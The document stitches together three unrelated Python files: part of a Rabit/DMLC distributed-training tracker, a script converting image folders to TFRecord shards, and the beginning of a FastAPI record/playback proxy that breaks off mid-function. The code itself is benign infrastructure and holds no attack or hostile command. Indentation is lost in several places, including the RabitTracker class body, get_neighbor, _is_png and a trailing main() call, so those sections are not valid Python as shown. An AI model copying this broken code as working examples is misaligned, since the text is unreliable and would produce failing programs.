        self.port = None

    def decide_rank(self, job_map):
        """Return this worker's rank: explicit, recovered via job id, or -1."""
        if self.rank >= 0:
            return self.rank
        if self.jobid != 'NULL' and self.jobid in job_map:
            return job_map[self.jobid]
        return -1

    def assign_rank(self, rank, wait_conn, tree_map, parent_map, ring_map):
        """Send topology info to the worker and drive link establishment.

        Loops until the worker reports all neighbor connections good; returns
        the ranks that can be removed from *wait_conn*.
        """
        self.rank = rank
        nnset = set(tree_map[rank])
        rprev, rnext = ring_map[rank]
        self.sock.sendint(rank)
        # send parent rank
        self.sock.sendint(parent_map[rank])
        # send world size
        self.sock.sendint(len(tree_map))
        self.sock.sendint(len(nnset))
        # send the rprev and next link
        for r in nnset:
            self.sock.sendint(r)
        # send prev link
        if rprev != -1 and rprev != rank:
            nnset.add(rprev)
            self.sock.sendint(rprev)
        else:
            self.sock.sendint(-1)
        # send next link
        if rnext != -1 and rnext != rank:
            nnset.add(rnext)
            self.sock.sendint(rnext)
        else:
            self.sock.sendint(-1)
        while True:
            # worker reports which neighbor links it already has
            ngood = self.sock.recvint()
            goodset = set([])
            for _ in range(ngood):
                goodset.add(self.sock.recvint())
            assert goodset.issubset(nnset)
            badset = nnset - goodset
            # tell the worker which missing neighbors are already listening
            conset = []
            for r in badset:
                if r in wait_conn:
                    conset.append(r)
            self.sock.sendint(len(conset))
            self.sock.sendint(len(badset) - len(conset))
            for r in conset:
                self.sock.sendstr(wait_conn[r].host)
                self.sock.sendint(wait_conn[r].port)
                self.sock.sendint(r)
            nerr = self.sock.recvint()
            if nerr != 0:
                continue  # retry until the worker connects cleanly
            self.port = self.sock.recvint()
            rmset = []
            # all connection was successuly setup
            for r in conset:
                wait_conn[r].wait_accept -= 1
                if wait_conn[r].wait_accept == 0:
                    rmset.append(r)
            for r in rmset:
                wait_conn.pop(r, None)
            # remaining neighbors will connect TO this worker later
            self.wait_accept = len(badset) - len(conset)
            return rmset
class RabitTracker(object):
"""
tracker for rabit
"""
def __init__(self, hostIP, nslave, port=5991, port_end=5999):
    """Bind the tracker socket on the first free port in [port, port_end).

    :param hostIP: The address to bind and advertise.
    :param nslave: The expected number of workers.
    :raise socket.error: if no port in the range can be bound.  (Fix: the
        original fell through silently, leaving self.port unset and
        listening on an unbound socket.)
    """
    sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
    for port in range(port, port_end):
        try:
            sock.bind((hostIP, port))
            self.port = port
            break
        except socket.error as e:
            # EADDRINUSE: 98 on Linux, 48 on macOS -- try the next port
            if e.errno in [98, 48]:
                continue
            else:
                raise
    else:
        sock.close()
        raise socket.error(
            'no available port to bind on %s below %d' % (hostIP, port_end))
    sock.listen(256)
    self.sock = sock
    self.hostIP = hostIP
    self.thread = None
    self.start_time = None
    self.end_time = None
    self.nslave = nslave
    logging.info('start listen on %s:%d', hostIP, self.port)
def __del__(self):
    # best-effort cleanup of the listening socket on garbage collection
    self.sock.close()
@staticmethod
def get_neighbor(rank, nslave):
rank = rank + 1
ret = []
if rank > 1:
ret.append(rank // 2 - 1)
if rank * 2 - 1 < nslave:
ret.append(rank * 2 - 1)
if rank * 2 < nslave:
ret.append(rank * 2)
return ret
def slave_envs(self):
    """
    get environment variables for slaves
    can be passed in as args or envs
    """
    return {'DMLC_TRACKER_URI': self.hostIP,
            'DMLC_TRACKER_PORT': self.port}
def get_tree(self, nslave):
    """Build the binary-tree topology: per-rank neighbor lists and parent
    ranks (-1 for the root)."""
    ranks = range(nslave)
    tree_map = {r: self.get_neighbor(r, nslave) for r in ranks}
    parent_map = {r: (r + 1) // 2 - 1 for r in ranks}
    return tree_map, parent_map
def find_share_ring(self, tree_map, parent_map, r):
    """
    get a ring structure that tends to share nodes with the tree
    return a list starting from r
    """
    nset = set(tree_map[r])
    cset = nset - set([parent_map[r]])  # children only
    if len(cset) == 0:
        return [r]  # leaf
    rlst = [r]
    cnt = 0
    for v in cset:
        vlst = self.find_share_ring(tree_map, parent_map, v)
        cnt += 1
        # reverse the last child's sub-ring so the ring closes back smoothly
        if cnt == len(cset):
            vlst.reverse()
        rlst += vlst
    return rlst
def get_ring(self, tree_map, parent_map):
    """
    get a ring connection used to recover local data
    """
    assert parent_map[0] == -1
    rlst = self.find_share_ring(tree_map, parent_map, 0)
    assert len(rlst) == len(tree_map)
    ring_map = {}
    nslave = len(tree_map)
    # ring_map[rank] = (prev, next) following the share-ring ordering
    for r in range(nslave):
        rprev = (r + nslave - 1) % nslave
        rnext = (r + 1) % nslave
        ring_map[rlst[r]] = (rlst[rprev], rlst[rnext])
    return ring_map
def get_link_map(self, nslave):
    """
    get the link map, this is a bit hacky, call for better algorithm
    to place similar nodes together

    Relabels ranks so that ring neighbors get consecutive rank numbers,
    then returns the (tree_map, parent_map, ring_map) under the new labels.
    """
    tree_map, parent_map = self.get_tree(nslave)
    ring_map = self.get_ring(tree_map, parent_map)
    # rmap: old rank -> new rank, walking the ring from rank 0
    rmap = {0 : 0}
    k = 0
    for i in range(nslave - 1):
        k = ring_map[k][1]
        rmap[k] = i + 1
    ring_map_ = {}
    tree_map_ = {}
    parent_map_ = {}
    for k, v in ring_map.items():
        ring_map_[rmap[k]] = (rmap[v[0]], rmap[v[1]])
    for k, v in tree_map.items():
        tree_map_[rmap[k]] = [rmap[x] for x in v]
    for k, v in parent_map.items():
        if k != 0:
            parent_map_[rmap[k]] = rmap[v]
        else:
            parent_map_[rmap[k]] = -1  # root keeps sentinel parent
    return tree_map_, parent_map_, ring_map_
def accept_slaves(self, nslave):
    """Main tracker loop: accept worker connections until all have shut down.

    Handles four commands from workers: 'print' (relay a log line),
    'shutdown' (worker finished), 'start' and 'recover' (rank assignment).
    Topology (tree/parent/ring maps) is built lazily on the first 'start'.
    """
    # set of nodes that finishs the job
    shutdown = {}
    # set of nodes that is waiting for connections
    wait_conn = {}
    # maps job id to rank
    job_map = {}
    # list of workers that is pending to be assigned rank
    pending = []
    # lazy initialize tree_map
    tree_map = None
    while len(shutdown) != nslave:
        # Each accepted connection is one command from one worker.
        fd, s_addr = self.sock.accept()
        s = SlaveEntry(fd, s_addr)
        if s.cmd == 'print':
            msg = s.sock.recvstr()
            logging.info(msg.strip())
            continue
        if s.cmd == 'shutdown':
            assert s.rank >= 0 and s.rank not in shutdown
            assert s.rank not in wait_conn
            shutdown[s.rank] = s
            logging.debug('Recieve %s signal from %d', s.cmd, s.rank)
            continue
        assert s.cmd == 'start' or s.cmd == 'recover'
        # lazily initialize the slaves
        if tree_map is None:
            # First worker must be a fresh 'start'; it may override nslave
            # with the world size it announces.
            assert s.cmd == 'start'
            if s.world_size > 0:
                nslave = s.world_size
            tree_map, parent_map, ring_map = self.get_link_map(nslave)
            # set of nodes that is pending for getting up
            todo_nodes = list(range(nslave))
        else:
            assert s.world_size == -1 or s.world_size == nslave
            if s.cmd == 'recover':
                assert s.rank >= 0
        rank = s.decide_rank(job_map)
        # batch assignment of ranks
        if rank == -1:
            # Worker has no rank yet: queue it, and assign ranks in one
            # batch (sorted by host, so co-located workers get close ranks)
            # once every remaining node has connected.
            assert len(todo_nodes) != 0
            pending.append(s)
            if len(pending) == len(todo_nodes):
                pending.sort(key=lambda x: x.host)
                for s in pending:
                    rank = todo_nodes.pop(0)
                    if s.jobid != 'NULL':
                        job_map[s.jobid] = rank
                    s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
                    if s.wait_accept > 0:
                        wait_conn[rank] = s
                    logging.debug('Recieve %s signal from %s; assign rank %d',
                                  s.cmd, s.host, s.rank)
                if len(todo_nodes) == 0:
                    logging.info('@tracker All of %d nodes getting started', nslave)
                    self.start_time = time.time()
        else:
            # Recovering worker already knows its rank; reassign directly.
            s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
            logging.debug('Recieve %s signal from %d', s.cmd, s.rank)
            if s.wait_accept > 0:
                wait_conn[rank] = s
    logging.info('@tracker All nodes finishes job')
    self.end_time = time.time()
    logging.info('@tracker %s secs between node start and job finish',
                 str(self.end_time - self.start_time))
def start(self, nslave):
    """Start accepting *nslave* workers on a background daemon thread."""
    def run():
        self.accept_slaves(nslave)
    self.thread = Thread(target=run, args=())
    # Thread.setDaemon() is deprecated since Python 3.10; set the attribute.
    self.thread.daemon = True
    self.thread.start()
def join(self):
    """Block until the tracker thread exits; poll so signals stay responsive."""
    # BUG FIX: Thread.isAlive() was removed in Python 3.9; use is_alive().
    while self.thread.is_alive():
        self.thread.join(100)
class PSTracker(object):
    """
    Tracker module for PS
    """
    def __init__(self, hostIP, cmd, port=5910, port_end=5930, envs=None):
        """
        Starts the PS scheduler.

        Parameters
        ----------
        hostIP : str
            IP the scheduler advertises to workers/servers.
        cmd : str or None
            Shell command launching the scheduler; None disables the tracker.
        port, port_end : int
            Half-open range of ports probed for a free one.
        envs : dict, optional
            Extra environment variables for the scheduler process.
        """
        self.cmd = cmd
        if cmd is None:
            # Disabled tracker: slave_envs()/join() become no-ops.
            return
        envs = {} if envs is None else envs
        self.hostIP = hostIP
        # Probe the port range for a bindable port.
        sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
        try:
            for port in range(port, port_end):
                try:
                    sock.bind(('', port))
                    self.port = port
                    break
                except socket.error:
                    continue
            else:
                # BUG FIX: previously self.port was silently left unset here,
                # surfacing later as an AttributeError; fail fast instead.
                raise socket.error('no available port in [%d, %d)' % (port, port_end))
        finally:
            # BUG FIX: the probe socket leaked when no port could be bound.
            sock.close()
        env = os.environ.copy()
        env['DMLC_ROLE'] = 'scheduler'
        env['DMLC_PS_ROOT_URI'] = str(self.hostIP)
        env['DMLC_PS_ROOT_PORT'] = str(self.port)
        for k, v in envs.items():
            env[k] = str(v)
        self.thread = Thread(
            target=(lambda: subprocess.check_call(self.cmd, env=env, shell=True)), args=())
        # setDaemon() is deprecated since Python 3.10.
        self.thread.daemon = True
        self.thread.start()

    def join(self):
        """Wait for the scheduler thread (no-op when cmd is None)."""
        if self.cmd is not None:
            # BUG FIX: isAlive() was removed in Python 3.9; use is_alive().
            while self.thread.is_alive():
                self.thread.join(100)

    def slave_envs(self):
        """Environment variables workers need to reach the PS scheduler."""
        if self.cmd is None:
            return {}
        else:
            return {'DMLC_PS_ROOT_URI': self.hostIP,
                    'DMLC_PS_ROOT_PORT': self.port}
def get_host_ip(hostIP=None):
    """Resolve the tracker's host IP.

    hostIP may be an explicit address (returned unchanged), 'dns' (use the
    fully-qualified hostname), or None/'auto'/'ip' (resolve via DNS, with a
    UDP-connect fallback when resolution yields a loopback address).
    """
    if hostIP is None or hostIP == 'auto':
        hostIP = 'ip'
    if hostIP == 'dns':
        hostIP = socket.getfqdn()
    elif hostIP == 'ip':
        from socket import gaierror
        try:
            hostIP = socket.gethostbyname(socket.getfqdn())
        except gaierror:
            # BUG FIX: logging.warn is a deprecated alias of logging.warning.
            logging.warning('gethostbyname(socket.getfqdn()) failed... trying on hostname()')
            hostIP = socket.gethostbyname(socket.gethostname())
        if hostIP.startswith("127."):
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            try:
                # doesn't have to be reachable; a UDP connect just selects
                # the outbound interface whose address we then read back.
                s.connect(('10.255.255.255', 1))
                hostIP = s.getsockname()[0]
            finally:
                # BUG FIX: the UDP socket was never closed.
                s.close()
    return hostIP
def submit(nworker, nserver, fun_submit, hostIP='auto', pscmd=None):
    """Launch a job: start the appropriate tracker, submit workers, then join.

    With nserver == 0 a Rabit tracker is used; otherwise a PS tracker.
    """
    if nserver == 0:
        pscmd = None
    envs = {'DMLC_NUM_WORKER' : nworker,
            'DMLC_NUM_SERVER' : nserver}
    hostIP = get_host_ip(hostIP)
    if nserver == 0:
        tracker = RabitTracker(hostIP=hostIP, nslave=nworker)
        envs.update(tracker.slave_envs())
        tracker.start(nworker)
    else:
        tracker = PSTracker(hostIP=hostIP, cmd=pscmd, envs=envs)
        envs.update(tracker.slave_envs())
    fun_submit(nworker, nserver, envs)
    tracker.join()
def start_rabit_tracker(args):
    """Standalone function to start rabit tracker.
    Parameters
    ----------
    args: arguments to start the rabit tracker.
    """
    envs = {'DMLC_NUM_WORKER' : args.num_workers,
            'DMLC_NUM_SERVER' : args.num_servers}
    rabit = RabitTracker(hostIP=get_host_ip(args.host_ip), nslave=args.num_workers)
    envs.update(rabit.slave_envs())
    rabit.start(args.num_workers)
    # simply write configuration to stdout, delimited by START/END markers
    out = sys.stdout
    out.write('DMLC_TRACKER_ENV_START\n')
    for key, value in envs.items():
        out.write('%s=%s\n' % (key, str(value)))
    out.write('DMLC_TRACKER_ENV_END\n')
    out.flush()
    rabit.join()
def main():
    """Main function if tracker is executed in standalone mode."""
    parser = argparse.ArgumentParser(description='Rabit Tracker start.')
    parser.add_argument('--num-workers', required=True, type=int,
                        help='Number of worker proccess to be launched.')
    parser.add_argument('--num-servers', default=0, type=int,
                        help='Number of server process to be launched. Only used in PS jobs.')
    parser.add_argument('--host-ip', default=None, type=str,
                        help=('Host IP addressed, this is only needed ' +
                              'if the host IP cannot be automatically guessed.'))
    parser.add_argument('--log-level', default='DEBUG', type=str,
                        choices=['INFO', 'DEBUG'],
                        help='Logging level of the logger.')
    args = parser.parse_args()

    fmt = '%(asctime)s %(levelname)s %(message)s'
    # argparse's `choices` already restricts the value; the lookup keeps the
    # original defensive error for anything unexpected.
    levels = {'INFO': logging.INFO, 'DEBUG': logging.DEBUG}
    if args.log_level not in levels:
        raise RuntimeError("Unknown logging level %s" % args.log_level)
    logging.basicConfig(format=fmt, level=levels[args.log_level])

    if args.num_servers == 0:
        start_rabit_tracker(args)
    else:
        raise RuntimeError("Do not yet support start ps tracker in standalone mode.")
if __name__ == "__main__":
main()
|
OID2TFRecords.py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If your data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
# Command-line flags: input/output directories, shard counts, worker threads.
# Shard counts must be divisible by num_threads (checked in main()).
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
                           'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
                           'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
                           'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
                            'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
                            'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
                            'Number of threads to preprocess the images.')

# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
#   dog
#   cat
#   flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number starting from 0.
tf.app.flags.DEFINE_string('labels_file', '', 'Labels file')

FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
    """Wrapper for inserting int64 features into Example proto."""
    values = value if isinstance(value, list) else [value]
    return tf.train.Feature(int64_list=tf.train.Int64List(value=values))
def _bytes_feature(value):
    """Wrapper for inserting bytes features into Example proto."""
    wrapped = tf.train.BytesList(value=[value])
    return tf.train.Feature(bytes_list=wrapped)
def _convert_to_example(filename, image_buffer, label, text, height, width):
    """Build an Example proto for an example.
    Args:
      filename: string, path to an image file, e.g., '/path/to/example.JPG'
      image_buffer: string, JPEG encoding of RGB image
      label: integer, identifier for the ground truth for the network
      text: string, unique human-readable, e.g. 'dog'
      height: integer, image height in pixels
      width: integer, image width in pixels
    Returns:
      Example proto
    """
    # All images are stored as RGB 3-channel JPEG.
    colorspace = 'RGB'
    channels = 3
    image_format = 'JPEG'

    feature = {
        'image/height': _int64_feature(height),
        'image/width': _int64_feature(width),
        'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),
        'image/channels': _int64_feature(channels),
        'image/class/label': _int64_feature(label),
        'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),
        'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),
        'image/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename))),
        'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer)),
    }
    return tf.train.Example(features=tf.train.Features(feature=feature))
class ImageCoder(object):
    """Helper class that provides TensorFlow image coding utilities.

    Builds two tiny TF1 graphs (PNG->JPEG re-encode and JPEG decode) once,
    then runs them through a single shared Session per call.
    """

    def __init__(self):
        # Create a single Session to run all image coding calls.
        self._sess = tf.Session()

        # Initializes function that converts PNG to JPEG data.
        self._png_data = tf.placeholder(dtype=tf.string)
        image = tf.image.decode_png(self._png_data, channels=3)
        self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)

        # Initializes function that decodes RGB JPEG data.
        self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
        self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)

    def png_to_jpeg(self, image_data):
        # Re-encode raw PNG bytes as JPEG bytes (RGB, quality 100).
        return self._sess.run(self._png_to_jpeg,
                              feed_dict={self._png_data: image_data})

    def decode_jpeg(self, image_data):
        # Decode JPEG bytes; the asserts guarantee an HxWx3 array.
        image = self._sess.run(self._decode_jpeg,
                               feed_dict={self._decode_jpeg_data: image_data})
        assert len(image.shape) == 3
        assert image.shape[2] == 3
        return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return '.png' in filename
def _process_image(filename, coder):
    """Process a single image file.
    Args:
      filename: string, path to an image file e.g., '/path/to/example.JPG'.
      coder: instance of ImageCoder to provide TensorFlow image coding utils.
    Returns:
      image_buffer: string, JPEG encoding of RGB image.
      height: integer, image height in pixels.
      width: integer, image width in pixels.
    """
    # Read the raw bytes of the image file.
    with tf.gfile.FastGFile(filename, 'rb') as f:
        image_data = f.read()

    # Convert any PNG to JPEG's for consistency.
    if _is_png(filename):
        print('Converting PNG to JPEG for %s' % filename)
        image_data = coder.png_to_jpeg(image_data)

    # Decode the RGB JPEG and check that it really is HxWx3.
    image = coder.decode_jpeg(image_data)
    assert len(image.shape) == 3
    assert image.shape[2] == 3

    return image_data, image.shape[0], image.shape[1]
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
                               texts, labels, num_shards):
    """Processes and saves list of images as TFRecord in 1 thread.
    Args:
      coder: instance of ImageCoder to provide TensorFlow image coding utils.
      thread_index: integer, unique batch to run index is within [0, len(ranges)).
      ranges: list of pairs of integers specifying ranges of each batches to
        analyze in parallel.
      name: string, unique identifier specifying the data set
      filenames: list of strings; each string is a path to an image file
      texts: list of strings; each string is human readable, e.g. 'dog'
      labels: list of integer; each integer identifies the ground truth
      num_shards: integer number of shards for this data set.
    """
    # Each thread produces N shards where N = int(num_shards / num_threads).
    # For instance, if num_shards = 128, and the num_threads = 2, then the first
    # thread would produce shards [0, 64).
    num_threads = len(ranges)
    assert not num_shards % num_threads
    num_shards_per_batch = int(num_shards / num_threads)

    shard_ranges = np.linspace(ranges[thread_index][0],
                               ranges[thread_index][1],
                               num_shards_per_batch + 1).astype(int)
    num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]

    counter = 0
    for s in range(num_shards_per_batch):
        # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
        shard = thread_index * num_shards_per_batch + s
        output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
        output_file = os.path.join(FLAGS.output_directory, output_filename)
        writer = tf.python_io.TFRecordWriter(output_file)

        shard_counter = 0
        files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
        for i in files_in_shard:
            filename = filenames[i]
            label = labels[i]
            text = texts[i]

            try:
                image_buffer, height, width = _process_image(filename, coder)
            except Exception as e:
                # Undecodable images are skipped rather than aborting the run.
                print(e)
                # BUG FIX: typo 'eror' -> 'error' in the skip message.
                print('SKIPPED: Unexpected error while decoding %s.' % filename)
                continue

            example = _convert_to_example(filename, image_buffer, label,
                                          text, height, width)
            writer.write(example.SerializeToString())
            shard_counter += 1
            counter += 1

            if not counter % 1000:
                print('%s [thread %d]: Processed %d of %d images in thread batch.' %
                      (datetime.now(), thread_index, counter, num_files_in_thread))
                sys.stdout.flush()

        writer.close()
        print('%s [thread %d]: Wrote %d images to %s' %
              (datetime.now(), thread_index, shard_counter, output_file))
        sys.stdout.flush()
        shard_counter = 0
    print('%s [thread %d]: Wrote %d images to %d shards.' %
          (datetime.now(), thread_index, counter, num_files_in_thread))
    sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
    """Process and save list of images as TFRecord of Example protos.
    Args:
      name: string, unique identifier specifying the data set
      filenames: list of strings; each string is a path to an image file
      texts: list of strings; each string is human readable, e.g. 'dog'
      labels: list of integer; each integer identifies the ground truth
      num_shards: integer number of shards for this data set.
    """
    assert len(filenames) == len(texts)
    assert len(filenames) == len(labels)

    # Break all images into batches with a [ranges[i][0], ranges[i][1]].
    # BUG FIX: np.int was deprecated in NumPy 1.20 and removed in 1.24; the
    # builtin `int` is the documented replacement.
    spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(int)
    ranges = []
    for i in range(len(spacing) - 1):
        ranges.append([spacing[i], spacing[i + 1]])

    # Launch a thread for each batch.
    print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
    sys.stdout.flush()

    # Create a mechanism for monitoring when all threads are finished.
    coord = tf.train.Coordinator()

    # Create a generic TensorFlow-based utility for converting all image codings.
    coder = ImageCoder()

    threads = []
    for thread_index in range(len(ranges)):
        args = (coder, thread_index, ranges, name, filenames,
                texts, labels, num_shards)
        t = threading.Thread(target=_process_image_files_batch, args=args)
        t.start()
        threads.append(t)

    # Wait for all the threads to terminate.
    coord.join(threads)
    print('%s: Finished writing all %d images in data set.' %
          (datetime.now(), len(filenames)))
    sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
    """Build a list of all images files and labels in the data set.
    Args:
      data_dir: string, path to the root directory of images; images for a
        label live under data_dir/<label>/.
      labels_file: string, path to the labels file (one label per line).
    Returns:
      filenames: list of strings; each string is a path to an image file.
      texts: list of strings; each string is the class, e.g. 'dog'
      labels: list of integer; each integer identifies the ground truth.
    """
    print('Determining list of input files and labels from %s.' % data_dir)
    unique_labels = [l.strip() for l in tf.gfile.FastGFile(
        labels_file, 'r').readlines()]

    labels = []
    filenames = []
    texts = []

    # Leave label index 0 empty as a background class.
    label_index = 1

    # Construct the list of JPEG files and labels.
    for text in unique_labels:
        jpeg_file_path = '%s/%s/*' % (data_dir, text)
        matching_files = tf.gfile.Glob(jpeg_file_path)

        labels.extend([label_index] * len(matching_files))
        texts.extend([text] * len(matching_files))
        filenames.extend(matching_files)

        if not label_index % 100:
            # BUG FIX: the progress message previously reported len(labels)
            # (files found so far) as the class count; report the number of
            # classes instead.
            print('Finished finding files in %d of %d classes.' % (
                label_index, len(unique_labels)))
        label_index += 1

    # Shuffle the ordering of all image files in order to guarantee
    # random ordering of the images with respect to label in the
    # saved TFRecord files. Make the randomization repeatable.
    shuffled_index = list(range(len(filenames)))
    random.seed(12345)
    random.shuffle(shuffled_index)

    filenames = [filenames[i] for i in shuffled_index]
    texts = [texts[i] for i in shuffled_index]
    labels = [labels[i] for i in shuffled_index]

    print('Found %d JPEG files across %d labels inside %s.' %
          (len(filenames), len(unique_labels), data_dir))
    return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
    """Process a complete data set and save it as a TFRecord.
    Args:
      name: string, unique identifier specifying the data set.
      directory: string, root path to the data set.
      num_shards: integer number of shards for this data set.
      labels_file: string, path to the labels file.
    """
    # Enumerate all images, then shard and serialize them.
    found = _find_image_files(directory, labels_file)
    filenames, texts, labels = found
    _process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
    """Validate flags and convert both dataset splits to TFRecords."""
    assert not FLAGS.train_shards % FLAGS.num_threads, (
        'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
    assert not FLAGS.validation_shards % FLAGS.num_threads, (
        'Please make the FLAGS.num_threads commensurate with '
        'FLAGS.validation_shards')
    print('Saving results to %s' % FLAGS.output_directory)

    # Run it!
    splits = (
        ('validation', FLAGS.validation_directory, FLAGS.validation_shards),
        ('train', FLAGS.train_directory, FLAGS.train_shards),
    )
    for split_name, directory, shards in splits:
        _process_dataset(split_name, directory, shards, FLAGS.labels_file)
# tf.app.run() parses the flags defined above and then invokes main().
if __name__ == '__main__':
    tf.app.run()
|
main.py | import websocket as _websocket
from fastapi import FastAPI
from fastapi import WebSocket as fWebSocket
from starlette.endpoints import WebSocketEndpoint
from starlette.requests import Request
from starlette.responses import Response, StreamingResponse
from httpx import AsyncClient
from io import BytesIO
import sys
import time
import threading
import os
from waiting import wait
import logging
from color_logger import logger
import asyncio
import settings
from recorder import Recorder
from player import Player
import utils
# Shared httpx client used for every proxied upstream request.
client = AsyncClient()
app = FastAPI()

# Populated by start() depending on the active mode; None until then.
recorder: Recorder = None
player: Player = None

# Mode flags derived from settings.mode by set_mode().
is_playback = False
is_record = False
is_proxy = False
def accept_socket(message: str):
    """Synchronously push *message* (utf-8 encoded) to the inbound websocket.

    Spins up a throwaway event loop so this can be called from non-async
    contexts such as the websocket-client callback thread.
    """
    event_loop = asyncio.new_event_loop()
    asyncio.set_event_loop(event_loop)
    event_loop.run_until_complete(inSocket.send_bytes(message.encode('utf-8')))
def print_welcome(mode: str):
    """Log a startup banner announcing the proxy mode and record name (if set)."""
    # Idiom fix: `is not None` instead of `!= None`; branch collapsed to a
    # conditional expression.
    record = f" {settings.record_name} " if settings.record_name is not None else " "
    logger.info("*************************************************")
    logger.info(f"\n\nSTARTING{record}IN {mode} MODE\n\n")
    logger.info("*************************************************")
def quit_proxy():
    """Forcefully kill every running playback-proxy process.

    NOTE(review): relies on a shell pipeline via os.system (BSD-style `ps`
    flags, backtick substitution); not portable and not injection-safe if
    ever parameterized -- fine only as a local dev tool. Confirm intent.
    """
    os.system("kill -9 `ps -jaxwww | grep \"[.]/playback-proxy\" | awk '{print $2}'`")
def start(record_name: str = None, mode: str = None):
    """(Re)start the proxy, optionally switching record name and mode first.

    Called once at import time (after settings.load_envs()) and again from
    the __playback-proxy control endpoints to switch modes at runtime.
    """
    # Idiom fix: `is not None` instead of `!= None`.
    if record_name is not None and mode is not None:
        settings.mode = mode
        settings.record_name = record_name
    set_mode()
    if is_record:
        utils.set_paths()
        print_welcome("RECORDING")
        global recorder
        recorder = Recorder()
        recorder.prepare()
    elif is_playback:
        utils.set_paths()
        print_welcome("PLAYBACK")
        global player
        player = Player(accept_socket)
        player.prepare()
    elif is_proxy:
        print_welcome("PROXY")
def set_mode():
    """Derive the is_playback / is_record / is_proxy flags from settings.mode."""
    global is_playback, is_record, is_proxy
    is_playback = settings.mode == "PLAYBACK"
    is_record = settings.mode == "RECORD"
    # RECORD implies proxying traffic upstream as well.
    is_proxy = is_record or settings.mode == "PROXY"
# Module initialization: read configuration from the environment, then
# start the proxy in the configured mode.
settings.load_envs()
start()
def proxied_url(rop: str):
    """Build the upstream URL for the given rest-of-path."""
    return "{}{}{}".format(settings.protocol, settings.endpoint, rop)
async def proxy_request(request: Request, rop: str):
    """Core proxy logic shared by all HTTP verbs.

    In PLAYBACK mode the response is served from the recorded session;
    otherwise the request is forwarded upstream (and saved in RECORD mode).
    The upstream response is re-wrapped as a Starlette Response, streaming
    images and passing JSON/text through directly.
    """
    if is_proxy and rop not in settings.ignore_log:
        logger.info(f"Asking {request.method} {request.url}")
    # (dropped the dead `result: httpx.Response` annotation -- `httpx` itself
    # is never imported, only AsyncClient is.)
    if is_playback:
        result = player.load_next(rop)
    else:
        body = await request.body()
        result = await client.request(
            method=request.method,
            url=proxied_url(rop),
            params=request.query_params,
            content=body
        )
        if is_record:
            recorder.save(rop, result)
    if is_proxy and rop not in settings.ignore_log:
        logger.info(f"Received {result.status_code} from {result.url}")
    headers = result.headers
    content_type = headers.get('content-type')
    if content_type is None:
        # No content type advertised: pass the text through as-is.
        return Response(
            result.text,
            headers=headers,
            status_code=result.status_code
        )
    if content_type == 'application/json':
        return Response(
            result.text,
            media_type="application/json",
            headers=headers,
            status_code=result.status_code
        )
